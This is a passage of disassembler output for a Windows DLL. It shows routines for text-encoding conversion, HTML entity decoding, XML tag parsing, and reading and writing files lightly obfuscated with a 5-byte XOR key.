call sub_10018621
movzx ecx, byte ptr [esi+1]
lea eax, [esi+1]
inc edi
lea edx, dword_1001EF30[ecx*8]
push eax
push edi
push edx
mov ecx, ebx
call dword ptr [edx+4]
pop edi
pop esi
pop ebx
retn 0Ch
sub_100187F7 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1001882C(int, void *Dst, void *Src)
sub_1001882C proc near ; DATA XREF: .rdata:1001EA5C�o
arg_0 = dword ptr 4
Dst = dword ptr 8
Src = dword ptr 0Ch
push [esp+Src] ; Src
mov dword ptr [ecx], 1
push [esp+4+Dst] ; Dst
push [esp+8+arg_0] ; int
call sub_10018714
retn 0Ch
sub_1001882C endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_10018846(int, void *Dst, void *Src)
sub_10018846 proc near ; DATA XREF: .rdata:1001EA64�o
arg_0 = dword ptr 4
Dst = dword ptr 8
Src = dword ptr 0Ch
push [esp+Src] ; Src
mov dword ptr [ecx+4], 1
push [esp+4+Dst] ; Dst
push [esp+8+arg_0] ; int
call sub_10018714
retn 0Ch
sub_10018846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10018861(int, void *Dst, void *Src)
sub_10018861 proc near ; DATA XREF: .rdata:1001EEDC�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 0Ch
Src = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+Src]
test byte ptr [eax+1], 38h
jnz short loc_10018887
push eax
mov [ebp+var_8], 10133F6h
push [ebp+Dst]
mov [ebp+var_4], offset sub_10018621
lea eax, [ebp+var_8]
jmp short loc_1001889C
; ---------------------------------------------------------------------------
loc_10018887: ; CODE XREF: sub_10018861+D�j
push eax ; Src
mov [ebp+var_10], 122F6h
push [ebp+Dst] ; Dst
mov [ebp+var_C], offset sub_10018621
lea eax, [ebp+var_10]
loc_1001889C: ; CODE XREF: sub_10018861+24�j
push eax ; int
call sub_10018621
leave
retn 0Ch
sub_10018861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100188A6(int, void *Dst, void *Src)
sub_100188A6 proc near ; DATA XREF: .rdata:1001EEE4�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 0Ch
Src = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+Src]
test byte ptr [eax+1], 38h
jnz short loc_100188CC
push eax
mov [ebp+var_8], 40146F7h
push [ebp+Dst]
mov [ebp+var_4], offset sub_10018621
lea eax, [ebp+var_8]
jmp short loc_100188E1
; ---------------------------------------------------------------------------
loc_100188CC: ; CODE XREF: sub_100188A6+D�j
push eax ; Src
mov [ebp+var_10], 122F7h
push [ebp+Dst] ; Dst
mov [ebp+var_C], offset sub_10018621
lea eax, [ebp+var_10]
loc_100188E1: ; CODE XREF: sub_100188A6+24�j
push eax ; int
call sub_10018621
leave
retn 0Ch
sub_100188A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100188EB(int, void *Dst, void *Src)
sub_100188EB proc near ; DATA XREF: .rdata:1001EF24�o
var_8 = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 0Ch
Src = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+Src]
mov al, [edx+1]
cmp al, 15h
jz short loc_10018918
cmp al, 25h
jz short loc_10018918
and al, 38h
cmp al, 10h
jz short loc_10018910
cmp al, 18h
jz short loc_10018910
cmp al, 20h
jz short loc_10018910
cmp al, 28h
jnz short loc_10018924
loc_10018910: ; CODE XREF: sub_100188EB+17�j
; sub_100188EB+1B�j ...
mov eax, [ecx+0Ch]
or dword ptr [eax], 0FFFFFFFFh
jmp short loc_10018924
; ---------------------------------------------------------------------------
loc_10018918: ; CODE XREF: sub_100188EB+D�j
; sub_100188EB+11�j
mov eax, [edx+2]
push esi
mov esi, [ecx+0Ch]
mov eax, [eax]
mov [esi], eax
pop esi
loc_10018924: ; CODE XREF: sub_100188EB+23�j
; sub_100188EB+2B�j
push edx ; Src
lea eax, [ebp+var_8]
push [ebp+Dst] ; Dst
mov [ebp+var_8], 122FFh
mov [ebp+var_4], offset sub_10018621
push eax ; int
call sub_10018621
leave
retn 0Ch
sub_100188EB endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10018943(void *lpv, int iSize)
sub_10018943 proc near ; CODE XREF: sub_1001A057+101�p
; sub_1001AB59+30�p
lpv = dword ptr 4
iSize = dword ptr 8
push 0 ; lpiResult
push [esp+4+iSize] ; iSize
push [esp+8+lpv] ; lpv
call ds:IsTextUnicode ; IsTextUnicode
retn
sub_10018943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10018954(LPCWSTR lpWideCharStr)
sub_10018954 proc near ; CODE XREF: sub_1001A057+136�p
var_8 = dword ptr -8
CodePage = dword ptr -4
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp Count, 1
push esi
push edi
mov [ebp+CodePage], ebx
jnz short loc_10018971
mov [ebp+CodePage], 0FDE9h
loc_10018971: ; CODE XREF: sub_10018954+14�j
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebx ; cbMultiByte
push ebx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov edi, ds:WideCharToMultiByte
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push [ebp+CodePage] ; CodePage
call edi ; WideCharToMultiByte
mov esi, eax
cmp esi, ebx
jge short loc_10018990
xor eax, eax
jmp short loc_100189B3
; ---------------------------------------------------------------------------
loc_10018990: ; CODE XREF: sub_10018954+36�j
lea eax, [esi+1]
push eax ; Size
call ds:malloc ; malloc
pop ecx
mov [ebp+var_8], eax
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push [ebp+CodePage] ; CodePage
call edi ; WideCharToMultiByte
mov eax, [ebp+var_8]
mov [eax+esi], bl
loc_100189B3: ; CODE XREF: sub_10018954+3A�j
pop edi
pop esi
pop ebx
leave
retn
sub_10018954 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100189B8(char *Filename)
sub_100189B8 proc near ; CODE XREF: sub_1000878F+85�p
; sub_1000A318+15D�p
v = byte ptr -1A0h
var_19F = byte ptr -19Fh
DstBuf = byte ptr -0D0h
var_CF = byte ptr -0CFh
String2 = byte ptr -0CBh
Filename = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A0h
push ebx
push offset Mode ; "rb"
push [ebp+Filename] ; Filename
call ds:fopen ; fopen
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
jz loc_10018A88
and [ebp+DstBuf], 0
push esi
push edi
push 33h
pop ecx
xor eax, eax
and [ebp+v], al
lea edi, [ebp+var_CF]
rep stosd
push 33h
lea edi, [ebp+var_19F]
pop ecx
rep stosd
push ebx ; File
push 0C8h ; Count
lea eax, [ebp+DstBuf]
push 1 ; ElementSize
push eax ; DstBuf
call ds:fread ; fread
add esp, 10h
mov esi, eax
push 5
pop eax
cmp esi, eax
jle short loc_10018A3F
loc_10018A24: ; CODE XREF: sub_100189B8+85�j
xor ecx, ecx
loc_10018A26: ; CODE XREF: sub_100189B8+80�j
mov dl, [ebp+ecx+DstBuf]
xor [ebp+eax+DstBuf], dl
inc ecx
cmp ecx, 5
jl short loc_10018A26
inc eax
cmp eax, esi
jl short loc_10018A24
loc_10018A3F: ; CODE XREF: sub_100189B8+6A�j
lea eax, [ebp+String2]
push eax ; lpString2
lea eax, [ebp+v]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov al, byte_10023EED
push eax
mov al, byte_10023EEC
push eax
push 1 ; char
lea eax, [ebp+v]
push esi ; iSize
push eax ; lpv
call sub_1001AB59
add esp, 0Ch
push eax
call sub_1001AAF4
push ebx ; File
call ds:fclose ; fclose
add esp, 10h
push 1
pop eax
pop edi
pop esi
jmp short loc_10018A8A
; ---------------------------------------------------------------------------
loc_10018A88: ; CODE XREF: sub_100189B8+1E�j
xor eax, eax
loc_10018A8A: ; CODE XREF: sub_100189B8+CE�j
pop ebx
leave
retn
sub_100189B8 endp
; =============== S U B R O U T I N E =======================================
sub_10018A8D proc near ; DATA XREF: .data:10022018�o
; FUNCTION CHUNK AT 10018A9F SIZE 0000000C BYTES
call sub_10018A97
jmp loc_10018A9F
sub_10018A8D endp
; =============== S U B R O U T I N E =======================================
sub_10018A97 proc near ; CODE XREF: sub_10018A8D�p
and dword_10073FF0, 0
retn
sub_10018A97 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10018A8D
loc_10018A9F: ; CODE XREF: sub_10018A8D+5�j
push offset sub_10018AAB ; void (__cdecl *)()
call _atexit
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_10018A8D
; =============== S U B R O U T I N E =======================================
; void __cdecl sub_10018AAB()
sub_10018AAB proc near ; DATA XREF: sub_10018A8D:loc_10018A9F�o
test byte_10073FF4, 1
jnz short locret_10018AC5
or byte_10073FF4, 1
mov ecx, offset dword_10073FF0
jmp sub_1001A728
; ---------------------------------------------------------------------------
locret_10018AC5: ; CODE XREF: sub_10018AAB+7�j
retn
sub_10018AAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10018AC6(char *Str, int, void *Memory)
sub_10018AC6 proc near ; CODE XREF: sub_1000A318+391�p
String = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
Size = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
File = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Memory = dword ptr 10h
mov eax, offset loc_1001D240
call _EH_prolog ; _EH_prolog
sub esp, 98h
and [ebp+String], 0
push ebx
push esi
push edi
mov ebx, ecx
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_A3]
mov [ebp+var_20], ebx
rep stosd
stosw
stosb
xor edi, edi
cmp [ebx], edi
jz loc_10018CF9
push offset aWb ; "wb"
push [ebp+Str] ; Filename
call ds:fopen ; fopen
pop ecx
cmp eax, edi
pop ecx
mov [ebp+File], eax
jnz short loc_10018B1D
push 10h
jmp loc_10018CEC
; ---------------------------------------------------------------------------
loc_10018B1D: ; CODE XREF: sub_10018AC6+4E�j
mov ecx, ebx
call sub_1001AADF
mov esi, ds:fwrite
test al, al
jnz loc_10018BD2
mov eax, [ebx]
cmp [eax], edi
jnz short loc_10018B69
lea eax, [ebp+var_24]
push edi
push eax
mov ecx, ebx
call sub_1001AAAC
mov ecx, eax
mov [ebp+var_4], edi
call sub_1001AADF
mov bl, al
lea ecx, [ebp+var_24]
neg bl
sbb bl, bl
or [ebp+var_4], 0FFFFFFFFh
inc bl
call sub_1001A728
test bl, bl
mov ebx, [ebp+var_20]
jz short loc_10018BD2
loc_10018B69: ; CODE XREF: sub_10018AC6+70�j
mov eax, Count
cmp eax, 1
jnz short loc_10018B9D
push [ebp+File] ; File
mov byte ptr [ebp+Str], 0EFh
mov byte ptr [ebp+Str+1], 0BBh
mov byte ptr [ebp+Str+2], 0BFh
push eax ; Count
lea eax, [ebp+Str]
push 3 ; Size
push eax ; Str
call esi ; fwrite
add esp, 10h
test eax, eax
jz loc_10018CEA
mov eax, offset aUtf8 ; "utf-8"
jmp short loc_10018BAA
; ---------------------------------------------------------------------------
loc_10018B9D: ; CODE XREF: sub_10018AC6+AB�j
cmp eax, 3
mov eax, offset aShiftJis ; "SHIFT-JIS"
jz short loc_10018BAA
mov eax, [ebp+arg_4]
loc_10018BAA: ; CODE XREF: sub_10018AC6+D5�j
; sub_10018AC6+DF�j
test eax, eax
jnz short loc_10018BB3
mov eax, offset aIso88591 ; "ISO-8859-1"
loc_10018BB3: ; CODE XREF: sub_10018AC6+E6�j
push eax
lea eax, [ebp+String]
push offset a?xmlVersion1_0 ; "<?xml version=\"1.0\" encoding=\"%s\"?>\n"
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
test eax, eax
jge short loc_10018BFF
jmp loc_10018CEA
; ---------------------------------------------------------------------------
loc_10018BD2: ; CODE XREF: sub_10018AC6+66�j
; sub_10018AC6+A1�j
cmp Count, 1
jnz short loc_10018BFF
push [ebp+File] ; File
lea eax, [ebp+Str]
mov byte ptr [ebp+Str], 0EFh
mov byte ptr [ebp+Str+1], 0BBh
push 1 ; Count
push 3 ; Size
push eax ; Str
mov byte ptr [ebp+Str+2], 0BFh
call esi ; fwrite
add esp, 10h
test eax, eax
jz loc_10018CEA
loc_10018BFF: ; CODE XREF: sub_10018AC6+105�j
; sub_10018AC6+113�j
and [ebp+var_18], 0
xor eax, eax
lea edi, [ebp+var_17]
mov ecx, ebx
stosd
lea eax, [ebp+Size]
push eax
movsx eax, byte ptr [ebp+Memory]
push eax
call sub_1001A6C0
xor ebx, ebx
mov [ebp+Memory], eax
push ebx ; Time
call ds:time ; time
push eax ; Seed
call ds:srand ; srand
pop ecx
xor edi, edi
pop ecx
loc_10018C30: ; CODE XREF: sub_10018AC6+180�j
call ds:rand ; rand
cdq
mov ecx, 100h
idiv ecx
inc edi
cmp edi, 5
mov byte ptr [ebp+edi+Size+3], al
jl short loc_10018C30
push [ebp+File] ; File
lea eax, [ebp+var_18]
push 1 ; Count
push 5 ; Size
push eax ; Str
call esi ; fwrite
mov edi, ds:lstrlenA
add esp, 10h
lea eax, [ebp+String]
push eax ; lpString
call edi ; lstrlenA
test eax, eax
jle short loc_10018C8C
loc_10018C6B: ; CODE XREF: sub_10018AC6+1C4�j
xor eax, eax
loc_10018C6D: ; CODE XREF: sub_10018AC6+1B6�j
mov cl, [ebp+eax+var_18]
xor [ebp+ebx+String], cl
inc eax
cmp eax, 5
jl short loc_10018C6D
lea eax, [ebp+String]
inc ebx
push eax ; lpString
call edi ; lstrlenA
cmp ebx, eax
jl short loc_10018C6B
loc_10018C8C: ; CODE XREF: sub_10018AC6+1A3�j
push [ebp+File] ; File
lea eax, [ebp+String]
push 1 ; Count
push eax ; lpString
call edi ; lstrlenA
push eax ; Size
lea eax, [ebp+String]
push eax ; Str
call esi ; fwrite
xor eax, eax
add esp, 10h
cmp [ebp+Size], eax
jle short loc_10018CC8
loc_10018CAE: ; CODE XREF: sub_10018AC6+200�j
mov edx, [ebp+Memory]
xor ecx, ecx
lea edi, [eax+edx]
loc_10018CB6: ; CODE XREF: sub_10018AC6+1FA�j
mov dl, [ebp+ecx+var_18]
xor [edi], dl
inc ecx
cmp ecx, 5
jl short loc_10018CB6
inc eax
cmp eax, [ebp+Size]
jl short loc_10018CAE
loc_10018CC8: ; CODE XREF: sub_10018AC6+1E6�j
push [ebp+File] ; File
push 1 ; Count
push [ebp+Size] ; Size
push [ebp+Memory] ; Str
call esi ; fwrite
add esp, 10h
test eax, eax
jz short loc_10018CEA
push [ebp+File] ; File
call ds:fclose ; fclose
test eax, eax
pop ecx
jz short loc_10018CEF
loc_10018CEA: ; CODE XREF: sub_10018AC6+CA�j
; sub_10018AC6+107�j ...
push 11h
loc_10018CEC: ; CODE XREF: sub_10018AC6+52�j
pop eax
jmp short loc_10018CFB
; ---------------------------------------------------------------------------
loc_10018CEF: ; CODE XREF: sub_10018AC6+222�j
push [ebp+Memory] ; Memory
call ds:free ; free
pop ecx
loc_10018CF9: ; CODE XREF: sub_10018AC6+33�j
xor eax, eax
loc_10018CFB: ; CODE XREF: sub_10018AC6+227�j
mov ecx, [ebp+var_C]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 0Ch
sub_10018AC6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10018D0C(char *Src, size_t Size)
sub_10018D0C proc near ; CODE XREF: sub_1001954D+83�p
; sub_10019709+FF�p ...
Src = dword ptr 4
Size = dword ptr 8
cmp [esp+Src], 0
jnz short loc_10018D16
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_10018D16: ; CODE XREF: sub_10018D0C+5�j
push esi
mov esi, [esp+4+Size]
test esi, esi
push edi
jnz short loc_10018D2C
push [esp+8+Src] ; Str
call strlen ; strlen
pop ecx
mov esi, eax
loc_10018D2C: ; CODE XREF: sub_10018D0C+12�j
lea eax, [esi+1]
push eax ; Size
call ds:malloc ; malloc
mov edi, eax
pop ecx
test edi, edi
jz short loc_10018D4F
push esi ; Size
push [esp+0Ch+Src] ; Src
push edi ; Dst
call memcpy ; memcpy
add esp, 0Ch
and byte ptr [edi+esi], 0
loc_10018D4F: ; CODE XREF: sub_10018D0C+2F�j
mov eax, edi
pop edi
pop esi
retn
sub_10018D0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10018D54(char *Dest, int)
sub_10018D54 proc near ; CODE XREF: sub_1001A22D+119�p
; sub_1001A22D+33C�p ...
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+Dest]
push edi
mov edi, [ebp+arg_4]
mov [ebp+Dest], esi
mov al, [edi]
test al, al
jz short loc_10018DC8
push ebx
loc_10018D69: ; CODE XREF: sub_10018D54+71�j
cmp al, byte_10023F40
mov ebx, offset off_10023F38
jz short loc_10018D83
loc_10018D76: ; CODE XREF: sub_10018D54+2D�j
add ebx, 0Ch
cmp dword ptr [ebx], 0
jz short loc_10018D92
cmp al, [ebx+8]
jnz short loc_10018D76
loc_10018D83: ; CODE XREF: sub_10018D54+20�j
push dword ptr [ebx] ; Source
push esi ; Dest
call strcpy ; strcpy
add esi, [ebx+4]
pop ecx
pop ecx
jmp short loc_10018DC0
; ---------------------------------------------------------------------------
loc_10018D92: ; CODE XREF: sub_10018D54+28�j
mov edx, off_10023F80
movzx ecx, al
movsx ecx, byte ptr [ecx+edx]
dec ecx
jz short loc_10018DBB
dec ecx
jz short loc_10018DB5
dec ecx
jz short loc_10018DAF
dec ecx
jnz short loc_10018DC1
mov [esi], al
inc esi
inc edi
loc_10018DAF: ; CODE XREF: sub_10018D54+52�j
mov al, [edi]
mov [esi], al
inc esi
inc edi
loc_10018DB5: ; CODE XREF: sub_10018D54+4F�j
mov al, [edi]
mov [esi], al
inc esi
inc edi
loc_10018DBB: ; CODE XREF: sub_10018D54+4C�j
mov al, [edi]
mov [esi], al
inc esi
loc_10018DC0: ; CODE XREF: sub_10018D54+3C�j
inc edi
loc_10018DC1: ; CODE XREF: sub_10018D54+55�j
mov al, [edi]
test al, al
jnz short loc_10018D69
pop ebx
loc_10018DC8: ; CODE XREF: sub_10018D54+12�j
and byte ptr [esi], 0
mov eax, [ebp+Dest]
pop edi
pop esi
pop ebp
retn
sub_10018D54 endp
; =============== S U B R O U T I N E =======================================
sub_10018DD2 proc near ; CODE XREF: sub_1001A22D+F4�p
; sub_1001A22D+2F0�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
loc_10018DD9: ; CODE XREF: sub_10018DD2+2B�j
; sub_10018DD2+3E�j
mov cl, [esi]
test cl, cl
jz short loc_10018E12
cmp cl, byte_10023F40
mov edx, offset off_10023F38
jz short loc_10018DF9
loc_10018DEC: ; CODE XREF: sub_10018DD2+25�j
add edx, 0Ch
cmp dword ptr [edx], 0
jz short loc_10018DFF
cmp cl, [edx+8]
jnz short loc_10018DEC
loc_10018DF9: ; CODE XREF: sub_10018DD2+18�j
add eax, [edx+4]
inc esi
jmp short loc_10018DD9
; ---------------------------------------------------------------------------
loc_10018DFF: ; CODE XREF: sub_10018DD2+20�j
mov edx, off_10023F80
movzx ecx, cl
movsx ecx, byte ptr [ecx+edx]
add eax, ecx
add esi, ecx
jmp short loc_10018DD9
; ---------------------------------------------------------------------------
loc_10018E12: ; CODE XREF: sub_10018DD2+B�j
pop esi
retn
sub_10018DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10018E14 proc near ; CODE XREF: sub_1000103A+8�p
; sub_1000103A+12�p
jmp $+5
sub_10018E14 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_10018E19 proc near
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_10018E2A
push eax ; Memory
call ds:free ; free
pop ecx
loc_10018E2A: ; CODE XREF: sub_10018E19+7�j
and dword ptr [esi], 0
and dword ptr [esi+4], 0
pop esi
retn
sub_10018E19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10018E33(void *Memory, int, int)
sub_10018E33 proc near ; CODE XREF: sub_1001967C+65�p
; sub_10019709+232�p
var_4 = dword ptr -4
Memory = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+Memory]
push edi
test esi, esi
jz loc_1001905C
and [ebp+var_4], 0
mov edi, esi
loc_10018E4B: ; CODE XREF: sub_10018E33+D9�j
cmp [ebp+arg_4], 0
jle loc_10018F11
mov al, [esi]
test al, al
jz loc_10018F11
cmp al, 26h
jnz loc_10018EED
cmp [ebp+arg_4], 2
jle short loc_10018EAD
cmp byte ptr [esi+1], 23h
jnz short loc_10018EAD
sub [ebp+arg_4], 2
inc esi
inc esi
mov al, [esi]
cmp al, 58h
jz short loc_10018E83
cmp al, 78h
jnz short loc_10018E87
loc_10018E83: ; CODE XREF: sub_10018E33+4A�j
inc esi
dec [ebp+arg_4]
loc_10018E87: ; CODE XREF: sub_10018E33+4E�j
; sub_10018E33+69�j
mov al, [esi]
test al, al
jz short loc_10018E9E
cmp al, 3Bh
jz short loc_10018E9E
mov eax, [ebp+arg_4]
dec [ebp+arg_4]
test eax, eax
jle short loc_10018E9E
inc esi
jmp short loc_10018E87
; ---------------------------------------------------------------------------
loc_10018E9E: ; CODE XREF: sub_10018E33+58�j
; sub_10018E33+5C�j ...
cmp byte ptr [esi], 3Bh
jnz loc_10019052
inc esi
dec [ebp+arg_4]
jmp short loc_10018F09
; ---------------------------------------------------------------------------
loc_10018EAD: ; CODE XREF: sub_10018E33+38�j
; sub_10018E33+3E�j
mov ebx, offset off_10023F38
loc_10018EB2: ; CODE XREF: sub_10018E33+A5�j
mov ecx, [ebx+4]
cmp [ebp+arg_4], ecx
jl short loc_10018ECC
mov eax, [ebx]
push ecx
push eax
push esi
call ds:_mbsnbicmp ; _mbsnbicmp
add esp, 0Ch
test eax, eax
jz short loc_10018EDA
loc_10018ECC: ; CODE XREF: sub_10018E33+85�j
add ebx, 0Ch
cmp dword ptr [ebx], 0
jz loc_10019052
jmp short loc_10018EB2
; ---------------------------------------------------------------------------
loc_10018EDA: ; CODE XREF: sub_10018E33+97�j
mov eax, [ebx+4]
sub [ebp+arg_4], eax
add esi, eax
cmp dword ptr [ebx], 0
jz loc_10019052
jmp short loc_10018F09
; ---------------------------------------------------------------------------
loc_10018EED: ; CODE XREF: sub_10018E33+2E�j
mov ecx, off_10023F80
movzx eax, al
movsx eax, byte ptr [eax+ecx]
mov ecx, [ebp+var_4]
add esi, eax
sub [ebp+arg_4], eax
lea eax, [ecx+eax-1]
mov [ebp+var_4], eax
loc_10018F09: ; CODE XREF: sub_10018E33+78�j
; sub_10018E33+B8�j
inc [ebp+var_4]
jmp loc_10018E4B
; ---------------------------------------------------------------------------
loc_10018F11: ; CODE XREF: sub_10018E33+1C�j
; sub_10018E33+26�j
mov eax, [ebp+var_4]
inc eax
push eax ; Size
call ds:malloc ; malloc
mov ebx, eax
pop ecx
mov [ebp+Memory], ebx
loc_10018F22: ; CODE XREF: sub_10018E33+1BA�j
; sub_10018E33+1CF�j ...
mov eax, [ebp+var_4]
dec [ebp+var_4]
test eax, eax
jle loc_10019060
mov al, [edi]
cmp al, 26h
jnz loc_10019007
cmp byte ptr [edi+1], 23h
jnz loc_10018FC6
inc edi
xor ecx, ecx
inc edi
mov al, [edi]
cmp al, 58h
jz short loc_10018F75
cmp al, 78h
jz short loc_10018F75
loc_10018F52: ; CODE XREF: sub_10018E33+140�j
cmp al, 3Bh
jz short loc_10018FC2
cmp al, 30h
jl loc_10019048
cmp al, 39h
jg loc_10019048
movsx eax, al
lea ecx, [ecx+ecx*4]
inc edi
lea ecx, [eax+ecx*2-30h]
mov al, [edi]
jmp short loc_10018F52
; ---------------------------------------------------------------------------
loc_10018F75: ; CODE XREF: sub_10018E33+119�j
; sub_10018E33+11D�j ...
mov al, [edi+1]
inc edi
cmp al, 3Bh
jz short loc_10018FC2
cmp al, 30h
jl short loc_10018F92
cmp al, 39h
jg short loc_10018F92
add ecx, 0FFFFFFFDh
movsx eax, al
shl ecx, 4
add ecx, eax
jmp short loc_10018F75
; ---------------------------------------------------------------------------
loc_10018F92: ; CODE XREF: sub_10018E33+14C�j
; sub_10018E33+150�j
cmp al, 41h
jl short loc_10018FA6
cmp al, 46h
jg short loc_10018FA6
movsx eax, al
shl ecx, 4
lea ecx, [ecx+eax-37h]
jmp short loc_10018F75
; ---------------------------------------------------------------------------
loc_10018FA6: ; CODE XREF: sub_10018E33+161�j
; sub_10018E33+165�j
cmp al, 61h
jl loc_10019048
cmp al, 66h
jg loc_10019048
movsx eax, al
shl ecx, 4
lea ecx, [ecx+eax-57h]
jmp short loc_10018F75
; ---------------------------------------------------------------------------
loc_10018FC2: ; CODE XREF: sub_10018E33+121�j
; sub_10018E33+148�j
mov [ebx], cl
jmp short loc_10019041
; ---------------------------------------------------------------------------
loc_10018FC6: ; CODE XREF: sub_10018E33+10B�j
push dword_10023F3C
mov esi, offset off_10023F38
push off_10023F38
loc_10018FD7: ; CODE XREF: sub_10018E33+1C4�j
push edi
call ds:_mbsnbicmp ; _mbsnbicmp
add esp, 0Ch
test eax, eax
jz short loc_10018FF9
mov eax, [esi+0Ch]
add esi, 0Ch
test eax, eax
jz loc_10018F22
push dword ptr [esi+4]
push eax
jmp short loc_10018FD7
; ---------------------------------------------------------------------------
loc_10018FF9: ; CODE XREF: sub_10018E33+1B0�j
mov al, [esi+8]
mov [ebx], al
inc ebx
add edi, [esi+4]
jmp loc_10018F22
; ---------------------------------------------------------------------------
loc_10019007: ; CODE XREF: sub_10018E33+101�j
mov edx, off_10023F80
movzx ecx, al
movsx ecx, byte ptr [ecx+edx]
dec ecx
jz short loc_1001903D
dec ecx
jz short loc_10019034
dec ecx
jz short loc_1001902B
dec ecx
jnz loc_10018F22
mov [ebx], al
inc ebx
inc edi
dec [ebp+var_4]
loc_1001902B: ; CODE XREF: sub_10018E33+1E8�j
mov al, [edi]
mov [ebx], al
inc ebx
inc edi
dec [ebp+var_4]
loc_10019034: ; CODE XREF: sub_10018E33+1E5�j
mov al, [edi]
mov [ebx], al
inc ebx
inc edi
dec [ebp+var_4]
loc_1001903D: ; CODE XREF: sub_10018E33+1E2�j
mov al, [edi]
mov [ebx], al
loc_10019041: ; CODE XREF: sub_10018E33+191�j
inc ebx
inc edi
jmp loc_10018F22
; ---------------------------------------------------------------------------
loc_10019048: ; CODE XREF: sub_10018E33+125�j
; sub_10018E33+12D�j ...
push [ebp+Memory] ; Memory
call ds:free ; free
pop ecx
loc_10019052: ; CODE XREF: sub_10018E33+6E�j
; sub_10018E33+9F�j ...
mov eax, [ebp+arg_8]
mov dword ptr [eax+10h], 0Eh
loc_1001905C: ; CODE XREF: sub_10018E33+C�j
xor eax, eax
jmp short loc_10019066
; ---------------------------------------------------------------------------
loc_10019060: ; CODE XREF: sub_10018E33+F7�j
and byte ptr [ebx], 0
mov eax, [ebp+Memory]
loc_10019066: ; CODE XREF: sub_10018E33+22B�j
pop edi
pop esi
pop ebx
leave
retn
sub_10018E33 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001906B(char *Str, int)
sub_1001906B proc near ; CODE XREF: sub_10019709+169�p
; sub_10019709+3E3�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+Str], 0
push esi
push edi
jz short loc_100190B9
push [esp+8+Str] ; Str
call strlen ; strlen
mov edi, [esp+0Ch+arg_4]
mov esi, eax
push esi
push edi
push [esp+14h+Str]
call ds:_mbsnbicmp ; _mbsnbicmp
add esp, 10h
test eax, eax
jnz short loc_100190B9
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_100190BD
cmp al, 20h
jz short loc_100190BD
cmp al, 9
jz short loc_100190BD
cmp al, 0Dh
jz short loc_100190BD
cmp al, 2Fh
jz short loc_100190BD
cmp al, 3Ch
jz short loc_100190BD
cmp al, 3Eh
jz short loc_100190BD
cmp al, 3Dh
jz short loc_100190BD
loc_100190B9: ; CODE XREF: sub_1001906B+7�j
; sub_1001906B+29�j
mov al, 1
jmp short loc_100190BF
; ---------------------------------------------------------------------------
loc_100190BD: ; CODE XREF: sub_1001906B+30�j
; sub_1001906B+34�j ...
xor al, al
loc_100190BF: ; CODE XREF: sub_1001906B+50�j
pop edi
pop esi
retn
sub_1001906B endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_100190C2(void *Memory)
sub_100190C2 proc near ; CODE XREF: sub_100190FC+60�p
Memory = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jnz short loc_100190DA
push [esp+4+Memory] ; Memory
call ds:free ; free
pop ecx
xor eax, eax
jmp short loc_100190F8
; ---------------------------------------------------------------------------
loc_100190DA: ; CODE XREF: sub_100190C2+7�j
